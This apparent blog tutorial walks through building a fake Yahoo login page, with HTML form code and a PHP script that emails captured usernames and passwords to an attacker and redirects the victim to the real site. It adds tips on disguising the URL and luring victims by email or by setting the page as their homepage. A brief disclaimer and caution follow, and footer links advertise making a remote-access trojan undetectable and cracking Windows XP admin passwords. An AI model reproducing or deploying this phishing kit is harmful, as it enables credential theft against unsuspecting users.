It’s quite easy to construct a bogus login page and steal password. Let’s look at the methods used to construct a fake login screen and how hackers steal your password.

Step 1: Create the fake login page

a) Take the print screen of the correct login page


b) Slice the web page using some tools like Photoshop

Slicing orginal login screen to make fake login screen
c) Save the file as HTML
d) Clean it up
e) Replace the main text box with our text box. Name it exactly as in the original. It will help to show the dropdown while they enter the address
f) Replace the form submit button
g) The code will look like this (don’t forget to add the design elements in between. Add CSS etc as needed)

<form method="post" action="submit.php">
<input name="username" type="text" size="15" maxlength="25" />
<input name="password" type="password" size="15" maxlength="25" />
<input name="Sign In" type="button" /></form>


Step 2: Add server side scripts to email the information and redirect to the correct login page

a) In submit.php write code like this

 
//extracting post

extract($_POST);

//making the email message

$message = "user name : ". $username."Password : ".$password;

// sending the email

mail('[email protected]', 'Hey here is the password', $message);

//you are done ...redirecting the user

header('Location: http://www.yahoo.com/');

?>

Step 3: Host them at a website
Host the website somewhere with some server side support like PHP, ASP, JSP etc.

Step 4: Name the URL so complicated such that user won’t notice it’s real or not
Name the login screen name like yahoo.com_mail_login.php?action=login&email=yes etc etc so that even if they look at the url, they don’t get suspicious

Step 5: Wait for the victim
Place this website as home page at the victim’s computer, send him the link through email etc and simply wait. If the user is not that tech savvy for sure he is gonna end up prey to the login screen hacking.

See how simple is it constructing and set up a fake login screen and steal the password. Beware of such scam and be cautious while entering the password. Always look for the correct domain name while entering the password. Internet explorer 8 onwards will highlight the correct URL in a different color compared to other strings in URL.

If you are on a shared computer beware, the attacker can write in the windows host file and even make the URL as mail.yahoo.com. (How? In another post)

Sample page : http://www.phishingsucks.110mb.com/ (Dont enter your real password)

Result page : http://phishingsucks.110mb.com/passwd.htm

We don’t endorse hacking or spying, this article was written to show how easy is it to setup fake login screen and how much we have to care while entering passwords.

Explore More

Study on the undetectable Server Bifrost 1.2d for the AV

1. Objective Trying to make the Bifrost Server 1.2d which is the latest version of a remote control KSV undetectable to Antivirus Software Required —– description ———————————————————————— Download Bifrost 1.2dR.AT

Weapons lab hacker escapes jail

A British schoolboy hacker has narrowly escaped jail after sparking a nuclear panic by keying into a top secret American weapons laboratory. Joseph McElroy, who was instead ordered to serve

How to Hack a Window XP Admins Password

This is a cool little computertrick for Microsoft Windows trick I’ve picked up in my travels and decided to share it with you fine and ethical individuals =). Log in